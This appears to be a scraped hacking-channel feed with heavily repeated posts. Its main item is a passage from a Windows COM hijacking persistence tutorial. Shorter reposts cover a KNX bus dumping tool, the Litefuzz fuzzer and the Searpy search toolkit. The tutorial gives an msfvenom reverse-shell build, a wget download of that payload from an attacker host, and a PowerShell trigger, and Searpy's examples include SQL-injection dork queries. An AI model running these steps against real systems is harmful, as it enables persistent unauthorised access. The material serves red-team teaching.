COM hijacking, we will create the following folder and add this DLL here. C:\Users\harshit\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E} Now, to execute this attack, we need to override the IE CLSID by referring to that CLSID…
s can be obtained using the reg query command:
reg query HKEY_CLASSES_ROOT\CLSID /s /f igniteserver
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifij8JvUcJphzQEqOrAxOEMspEp_5bOhg-Tkb7KYcCrxi2z0OObLJF6BGI9VDQZ_W-uoGIdvOnmDkucWQ980LdcDBv3SaTr1GxaiAa_wmq9pvego3bN0r17qcpgixp48V_raPOOOAItV1W7WV10i0GeZ7Yh1vNZr5HXQHd0gazbFfWpqHuTtQk3VBiJA/s16000/27.png?w=640&ssl=1
We have obtained the CLSID reference of this COM object which is 05EAE363-122A-445A-97B6-3DE890E786F8. This can be confirmed in regedit.
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC36CeYaUnSiTXxTypHP8zPQvZ_D9AyGxPNmFgiIize0vQu-h2jTC-k_WnTOSpB9cKE_jUCRJ2lCYS2KxS776N-xLo_5K5okz8hSUgur7tLXUJbL3sHWRt7crGI__GP5l0oxb_QQN8Igzen57cpERhhfBkfn1IUafdJ88je110NMDCh9NNKKQV3vs0mg/s16000/28.png?w=640&ssl=1
Now, we need to create an EXE with name igniteserver.exe
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.1.4 lport=1337 -f exe > igniteserver.exe
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxW74CWorL3ptwc0TSjajybGSR2aBj--1PtSwE5iy0rWn-gLuHYVDxv-0CNNp0oTjrFhPdxzIOnWB66FuxqjgZDDv6ZzXe1HOolzPQdBvii_EMWs_Pce4pVjyvYa3DMwtNrnPSzEcA_AsVtEcy-64l8Itf7oZA5eOM2CBNkFnn_4v8Jrg26cVgYekpQ/s16000/29.png?w=640&ssl=1
Now we need to transfer it to the desired location (C:\Users\Public)
wget 192.168.1.4/igniteserver.exe -O igniteserver.ex
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoaew6UFPwrnn7mQ_U8XarAVi8J5jNVTIup9X3nQ9Hia_FbBmPidnLvYHeYAUkSbOMtGp8uplqwJUoME9eN_F1vxSBhT7oNj9P91G6C5lehZIEVptBSnaC0oIw97zXluaaCzlE4vp3i-mZ252vuKu9xBNax_2puitBFK90WuCp1IyfGfzQRXMWETg7rg/s16000/30.png?w=640&ssl=1
Whenever an application will activate the COM object using this command, we will get persistence. If the application is run as admin we might escalate our privileges as well!
Now, the application which activates this COM object is using the create instance command in the respective programming language. We are just simulating the same using Powershell like so:
[activator]::CreateInstance([type]::GetTypeFromCLSID("{05EAE363-122A-445A-97B6-3DE890E786F8}"))
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVl5f9FAuKGqzfdEnZPMIG-4KmArQl78_-rp89Z2U2pepHG1xXfKoZ2vcPkWxUhsE0jkU3lLOS5TRCnbLuBUI6b87F4gyfzKduMhR6JhkhilYFrKubrwkH-Pd3EExrPC0kwZv_CU-gIkziDcvhJUWGEUZiDUe_4xDtTt-ULUCvQSpGf-BG_jdPfKbh1g/s16000/31.png?w=640&ssl=1
As soon as the application creates this instance and runs the COM key reference, we get our reverse shell!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHXkJmkVAyIKU9X-vodAZwKmfcvEamVj3Cw3waT9R5EgjXhjTR_c44W63rZHIg8Ge0kr41P4k1lzOkxcPY1YtpvD3Wlj_rBOLVT9Nf7h_m5V0HaVid8eRCnyGLChKs9uDdNV5_v2xzr029u93zOe8gZuDLxCJNG5LwfVnVtvJBFQBueplRHMOts-Oa-Q/s16000/32.png?w=640&ssl=1 ConclusionIn the article, we saw a demonstration of how we can use hijackable COM keys (that miss references to libraries) to gain persistence. We saw two methods InProcServer32 and LocalServer32 that are used by applications to run libraries in a process. Since the execution of these libraries is automated, replacing them with our malicious file would mean automated execution of our code as soon as the related application starts. In the InProcServer32 method, we create another reference to the same COM key existing in HKLM, in HKCU and override the execution. On the other hand, in the LocalServer32 method, we replace an EXE reference with our malicious one. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here
The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
reg query HKEY_CLASSES_ROOT\CLSID /s /f igniteserver
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifij8JvUcJphzQEqOrAxOEMspEp_5bOhg-Tkb7KYcCrxi2z0OObLJF6BGI9VDQZ_W-uoGIdvOnmDkucWQ980LdcDBv3SaTr1GxaiAa_wmq9pvego3bN0r17qcpgixp48V_raPOOOAItV1W7WV10i0GeZ7Yh1vNZr5HXQHd0gazbFfWpqHuTtQk3VBiJA/s16000/27.png?w=640&ssl=1
We have obtained the CLSID reference of this COM object which is 05EAE363-122A-445A-97B6-3DE890E786F8. This can be confirmed in regedit.
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC36CeYaUnSiTXxTypHP8zPQvZ_D9AyGxPNmFgiIize0vQu-h2jTC-k_WnTOSpB9cKE_jUCRJ2lCYS2KxS776N-xLo_5K5okz8hSUgur7tLXUJbL3sHWRt7crGI__GP5l0oxb_QQN8Igzen57cpERhhfBkfn1IUafdJ88je110NMDCh9NNKKQV3vs0mg/s16000/28.png?w=640&ssl=1
Now, we need to create an EXE with name igniteserver.exe
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.1.4 lport=1337 -f exe > igniteserver.exe
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKxW74CWorL3ptwc0TSjajybGSR2aBj--1PtSwE5iy0rWn-gLuHYVDxv-0CNNp0oTjrFhPdxzIOnWB66FuxqjgZDDv6ZzXe1HOolzPQdBvii_EMWs_Pce4pVjyvYa3DMwtNrnPSzEcA_AsVtEcy-64l8Itf7oZA5eOM2CBNkFnn_4v8Jrg26cVgYekpQ/s16000/29.png?w=640&ssl=1
Now we need to transfer it to the desired location (C:\Users\Public)
wget 192.168.1.4/igniteserver.exe -O igniteserver.ex
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoaew6UFPwrnn7mQ_U8XarAVi8J5jNVTIup9X3nQ9Hia_FbBmPidnLvYHeYAUkSbOMtGp8uplqwJUoME9eN_F1vxSBhT7oNj9P91G6C5lehZIEVptBSnaC0oIw97zXluaaCzlE4vp3i-mZ252vuKu9xBNax_2puitBFK90WuCp1IyfGfzQRXMWETg7rg/s16000/30.png?w=640&ssl=1
Whenever an application will activate the COM object using this command, we will get persistence. If the application is run as admin we might escalate our privileges as well!
Now, the application which activates this COM object is using the create instance command in the respective programming language. We are just simulating the same using Powershell like so:
[activator]::CreateInstance([type]::GetTypeFromCLSID("{05EAE363-122A-445A-97B6-3DE890E786F8}"))
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVl5f9FAuKGqzfdEnZPMIG-4KmArQl78_-rp89Z2U2pepHG1xXfKoZ2vcPkWxUhsE0jkU3lLOS5TRCnbLuBUI6b87F4gyfzKduMhR6JhkhilYFrKubrwkH-Pd3EExrPC0kwZv_CU-gIkziDcvhJUWGEUZiDUe_4xDtTt-ULUCvQSpGf-BG_jdPfKbh1g/s16000/31.png?w=640&ssl=1
As soon as the application creates this instance and runs the COM key reference, we get our reverse shell!
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHXkJmkVAyIKU9X-vodAZwKmfcvEamVj3Cw3waT9R5EgjXhjTR_c44W63rZHIg8Ge0kr41P4k1lzOkxcPY1YtpvD3Wlj_rBOLVT9Nf7h_m5V0HaVid8eRCnyGLChKs9uDdNV5_v2xzr029u93zOe8gZuDLxCJNG5LwfVnVtvJBFQBueplRHMOts-Oa-Q/s16000/32.png?w=640&ssl=1 ConclusionIn the article, we saw a demonstration of how we can use hijackable COM keys (that miss references to libraries) to gain persistence. We saw two methods InProcServer32 and LocalServer32 that are used by applications to run libraries in a process. Since the execution of these libraries is automated, replacing them with our malicious file would mean automated execution of our code as soon as the related application starts. In the InProcServer32 method, we create another reference to the same COM key existing in HKLM, in HKCU and override the execution. On the other hand, in the LocalServer32 method, we replace an EXE reference with our malicious one. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here
The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
New WatchGuard Threat Lab Report Shows Network Attacks at Highest Point Over Last Three Years
Network detections in EMEA quadrupled, with malware detections occurring at nearly twice the rate as the rest of the world.
___________________________
@hacking_Attack
@Hacking_Video
New WatchGuard Threat Lab Report Shows Network Attacks at Highest Point Over Last Three Years
Network detections in EMEA quadrupled, with malware detections occurring at nearly twice the rate as the rest of the world.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
New WatchGuard Threat Lab Report Shows Network Attacks at Highest Point Over Last Three Years
Network detections in EMEA quadrupled, with malware detections occurring at nearly twice the rate as the rest of the world.
KNX-Bus-Dump - A Tool To Listen On A KNX Bus Via TPUART And The Calimero Project Suite And To Dump The Data From The Packets Into A Wireshark-Compatible File Hex Dump
http://www.kitploit.com/2022/04/knx-bus-dump-tool-to-listen-on-knx-bus.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/04/knx-bus-dump-tool-to-listen-on-knx-bus.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
KNX-Bus-Dump - A Tool To Listen On A KNX Bus Via TPUART And The Calimero Project Suite And To Dump The Data From The Packets Into…
KNX is a popular building automation (https://www.kitploit.com/search/label/Automation) protocol and is used to interconnect sensors, actuators and other components of a smart building together. Our KNX Bus Dump tool uses the Calimero java library, which we contributed to for the sake of this tool, to record the telegrams sent over a KNX bus. Particularly, our tool accesses the KNX bus through a TPUART connection but can be changed to use different connection mediums. The telegrams are dumped into a Wireshark-compatible hex dump file. Timestamps are provided and normalized to UTC time with nanosecond precision to perform data analysis and provide a timeline of the telegrams. The hex dump file can be imported into Wireshark, which can be configured to dissect the KNX telegrams with Wireshark’s cEMI dissector.
Our tool can be used for protocol analysis (https://www.kitploit.com/search/label/Protocol%20Analysis) of KNX sensors, actuators and other KNX devices. For example, we used the tool to understand our KNX devices and found irregular KNX telegrams. The tool is also ideal for security analysis of KNX devices given that it exposes all details of the involved protocol and data sent over the KNX bus. Tcpdump and Wireshark cannot be used to dump telegrams sent over a KNX bus since we are dealing with native KNX telegrams, not TCP/IP packets. Wireshark and tcpdump can dump KNXnet/IP packets, which are TCP/IP packets. KNXnet/IP is a protocol for sending commands and data to a KNX bus over a TCP/IP network. Prerequisites This tool is designed to work with the Calimero Java library and is compatible with a Raspberry Pi (https://www.kitploit.com/search/label/Raspberry%20Pi) 3 or 4 and a Raspberry Pi HAT for the TPUART connection. Here are some guides to getting the environment setup: KNX Raspberry PiHAT Usage Walkthrough (https://github.com/ChrisM09/KNX-Bus-Dump/blob/main/KNX-Raspberry-Pi-Hat-Usage/README.md) Raspberry Pi and Calimero Suite Setup (https://github.com/ChrisM09/KNX-Bus-Dump/blob/main/Raspberry-Pi-Calimero-Setup/README.md) Note: The next steps will assume that you setup your environment according to these guides. Usage Creating the Hex Dump Place the KNXBusDump.java file into the introduction/src/main/java/ folder of the Calimero Project suite. Change into the introduction folder. To run the program, you can simply run: ./gradlew run -Pcalimero.serial.tpuart.maxInterByteDelay=60000 -DmainClass=KNXBusDump
Refer to the troubleshooting guide below for some common error solutions. Now, you wait for some messages to be transmitted on the bus and the dumped telegrams will be in the KNXBusDump-Telegrams.txt file. Cancel the tool using Ctrl-C and the file is now ready to be imported into Wireshark to be analyzed. Analyzing the Hex Dump In Wireshark, you have the ability to import packets from a hex dump and specify a dissector to analyze the packet. Upon starting Wireshark, wait for the initial loading to finish. Then click File -> Import From Hex Dump...
___________________________
@hacking_Attack
@Hacking_Video
Our tool can be used for protocol analysis (https://www.kitploit.com/search/label/Protocol%20Analysis) of KNX sensors, actuators and other KNX devices. For example, we used the tool to understand our KNX devices and found irregular KNX telegrams. The tool is also ideal for security analysis of KNX devices given that it exposes all details of the involved protocol and data sent over the KNX bus. Tcpdump and Wireshark cannot be used to dump telegrams sent over a KNX bus since we are dealing with native KNX telegrams, not TCP/IP packets. Wireshark and tcpdump can dump KNXnet/IP packets, which are TCP/IP packets. KNXnet/IP is a protocol for sending commands and data to a KNX bus over a TCP/IP network. Prerequisites This tool is designed to work with the Calimero Java library and is compatible with a Raspberry Pi (https://www.kitploit.com/search/label/Raspberry%20Pi) 3 or 4 and a Raspberry Pi HAT for the TPUART connection. Here are some guides to getting the environment setup: KNX Raspberry PiHAT Usage Walkthrough (https://github.com/ChrisM09/KNX-Bus-Dump/blob/main/KNX-Raspberry-Pi-Hat-Usage/README.md) Raspberry Pi and Calimero Suite Setup (https://github.com/ChrisM09/KNX-Bus-Dump/blob/main/Raspberry-Pi-Calimero-Setup/README.md) Note: The next steps will assume that you setup your environment according to these guides. Usage Creating the Hex Dump Place the KNXBusDump.java file into the introduction/src/main/java/ folder of the Calimero Project suite. Change into the introduction folder. To run the program, you can simply run: ./gradlew run -Pcalimero.serial.tpuart.maxInterByteDelay=60000 -DmainClass=KNXBusDump
Refer to the troubleshooting guide below for some common error solutions. Now, you wait for some messages to be transmitted on the bus and the dumped telegrams will be in the KNXBusDump-Telegrams.txt file. Cancel the tool using Ctrl-C and the file is now ready to be imported into Wireshark to be analyzed. Analyzing the Hex Dump In Wireshark, you have the ability to import packets from a hex dump and specify a dissector to analyze the packet. Upon starting Wireshark, wait for the initial loading to finish. Then click File -> Import From Hex Dump...
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
In order to properly parse this out, we need to give it a regular expression (https://www.kitploit.com/search/label/Regular%20Expression) (regex) with some tags. ^\s*(?\d{4}-\d\d\-\d\dT(\d\d\:){2}\d\d.(\d){6}[Z])\s(?\d{6})\s+(?[0-9a-fA-F]*)$
Choose the hex dump file as the source. Under the new dialog, change to the Regular Expression tab and paste the regex into the box. Ensure that the data encoding is Plain hex 200*16 In the Timestamp format textbox, we need to specify the pattern that is generated by the tool. %Y-%m-%dT%H:%M:%S.%fZ
NOTE: The timestamp format MUST be the EXACT SAME as this. Otherwise, there will not be a timestamp parsed out. Under the Encapsulation section, change Encapsulation Type to Wireshark Upper PDU Export. Check ExportPDU to specify the cemi dissector. Now you're able to import the file and analyze the telegram.
___________________________
@hacking_Attack
@Hacking_Video
Choose the hex dump file as the source. Under the new dialog, change to the Regular Expression tab and paste the regex into the box. Ensure that the data encoding is Plain hex 200*16 In the Timestamp format textbox, we need to specify the pattern that is generated by the tool. %Y-%m-%dT%H:%M:%S.%fZ
NOTE: The timestamp format MUST be the EXACT SAME as this. Otherwise, there will not be a timestamp parsed out. Under the Encapsulation section, change Encapsulation Type to Wireshark Upper PDU Export. Check ExportPDU to specify the cemi dissector. Now you're able to import the file and analyze the telegram.
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Note: The time that is highlighted is the NORMALIZED UTC TIME. No matter what the timezone next to the time says, it will ALWAYS be the right time in UTC.
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Litefuzz : A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers
Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.
It isn’t built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumention capabilities (and faster non-instrumented execs), scale and can make freakin’ jpegs out of thin air. For networking fuzzing, the mutiny fuzzer also works well if you have PCAPs to replay and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.
./ and give your target… a lite fuzz.
sudo apt install latex2rtf
./litefuzz.py -l -c “latex2rtf FUZZ” -i input/tex -o crashes/latex2rtf -n 1000 -z
–========================–
–======| litefuzz |======–
–========================–
[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)
@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)
[RESULTS]
completed (1000) iterations with (3) unique crashes and 127 dups
check crashes/latex2rtf for more details
This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you’ll see once you dive in. whyYes, another fuzzer and one that doesn’t track all that well with the current trends and conventions. Trade-offs were made to address certain requirements. These requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let’s provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem as this fuzzer does not require instrumentation, sacraficing the precise coverage gained by instrumentation for ease and portability. AFL also doesn’t support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn’t do parallel fuzzing, nor support anything like the blazing speed improvments that persistent mode can provide, so it cannot scale anywhere close to what fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn’t require source code, properly up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.
It was designed to “just work” and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and most importantly and for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn’t presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as a R&D project rather than a fully-fl[...]
___________________________
@hacking_Attack
@Hacking_Video
Litefuzz : A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers
Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.
It isn’t built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumention capabilities (and faster non-instrumented execs), scale and can make freakin’ jpegs out of thin air. For networking fuzzing, the mutiny fuzzer also works well if you have PCAPs to replay and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.
./ and give your target… a lite fuzz.
sudo apt install latex2rtf
./litefuzz.py -l -c “latex2rtf FUZZ” -i input/tex -o crashes/latex2rtf -n 1000 -z
–========================–
–======| litefuzz |======–
–========================–
[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)
@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)
[RESULTS]
completed (1000) iterations with (3) unique crashes and 127 dups
check crashes/latex2rtf for more details
This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you’ll see once you dive in. whyYes, another fuzzer and one that doesn’t track all that well with the current trends and conventions. Trade-offs were made to address certain requirements. These requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let’s provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem as this fuzzer does not require instrumentation, sacraficing the precise coverage gained by instrumentation for ease and portability. AFL also doesn’t support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn’t do parallel fuzzing, nor support anything like the blazing speed improvments that persistent mode can provide, so it cannot scale anywhere close to what fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn’t require source code, properly up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.
It was designed to “just work” and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and most importantly and for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn’t presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as a R&D project rather than a fully-fl[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Litefuzz : A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers - Kali Linux Tutorials
Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Searpy : Search Engine Toolkit
Searpy, as its name implies, search engine optimization is the practice of optimizing websites and web pages for discovery in search engines.
Install
git clone https://github.com/j3ers3/Searpy
pip install -r requirement.txt
配置API及账号 ./config.py
python Searpy -h
Help
Searpy Engine Tookit
optional arguments:
-h, –help show this help message and exit
ENGINE:
–baidu Using baidu Engine
–google Using google Engine
–so Using 360so Engine
–bing Using bing Engine
–shodan Using shodan Engine
–fofa Using fofa Engine
–zoomeye Using zoomeye Engine
–goo Using goo Engine
–yahoo Using yahoo Engine
SCRIPT:
–shodan_icon SHODAN_ICON
Get ip list which using the same favicon.ico
–fofa_icon FOFA_ICON
Get ip list which using the same favicon.ico
MISC:
-s SEARCH Speciy Keyword
-o OUTPUT Specify output file default output.txt
-p PAGE Search page (default 1)
-l LIMIT Maximum searching results (default:10) Only Shodan
Example
python3 Searpy.py –fofa -s “app=jboss” -p 1
python3 Searpy.py –shodan -s “weblogic” -l 10
python3 Searpy.py –google -s “inurl:login.action” -p 1
Other functions
Use favicon.icon icon hash to find websites with the same icon, which can be used for real IP traceability and asset discovery
python3 Searpy.py –shodan_icon https://www.qq.com
python3 Searpy.py –fofa_icon https://www.qq.com
Module call
from Searpy import Bing
s = Bing(‘inurl:php?id=1’, 2)
s.search()
for i in s.result:
print(i)
Support search engine
* Shodan
* Cute
* Zoomeye
* censys
* Dnsdb
* Google
* Baidu
* Bing
* 360 so
* Goo
* Yahoo
Everything
* Add subdomain search
ChangeLog
v2.3
* fix some bugs
* add fofa_icon module
v2.2
* fix some bugs
Download
___________________________
@hacking_Attack
@Hacking_Video
Searpy : Search Engine Toolkit
Searpy, as its name implies, search engine optimization is the practice of optimizing websites and web pages for discovery in search engines.
Install
git clone https://github.com/j3ers3/Searpy
pip install -r requirement.txt
配置API及账号 ./config.py
python Searpy -h
Help
Searpy Engine Tookit
optional arguments:
-h, –help show this help message and exit
ENGINE:
–baidu Using baidu Engine
–google Using google Engine
–so Using 360so Engine
–bing Using bing Engine
–shodan Using shodan Engine
–fofa Using fofa Engine
–zoomeye Using zoomeye Engine
–goo Using goo Engine
–yahoo Using yahoo Engine
SCRIPT:
–shodan_icon SHODAN_ICON
Get ip list which using the same favicon.ico
–fofa_icon FOFA_ICON
Get ip list which using the same favicon.ico
MISC:
-s SEARCH Speciy Keyword
-o OUTPUT Specify output file default output.txt
-p PAGE Search page (default 1)
-l LIMIT Maximum searching results (default:10) Only Shodan
Example
python3 Searpy.py –fofa -s “app=jboss” -p 1
python3 Searpy.py –shodan -s “weblogic” -l 10
python3 Searpy.py –google -s “inurl:login.action” -p 1
Other functions
Use favicon.icon icon hash to find websites with the same icon, which can be used for real IP traceability and asset discovery
python3 Searpy.py –shodan_icon https://www.qq.com
python3 Searpy.py –fofa_icon https://www.qq.com
Module call
from Searpy import Bing
s = Bing(‘inurl:php?id=1’, 2)
s.search()
for i in s.result:
print(i)
Support search engine
* Shodan
* Cute
* Zoomeye
* censys
* Dnsdb
* Baidu
* Bing
* 360 so
* Goo
* Yahoo
Everything
* Add subdomain search
ChangeLog
v2.3
* fix some bugs
* add fofa_icon module
v2.2
* fix some bugs
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Searpy : Search Engine Toolkit !!! Kali Linux Tutorials
Searpy, as its name implies, search engine optimization is the practice of optimizing websites and web pages for discovery in search engines.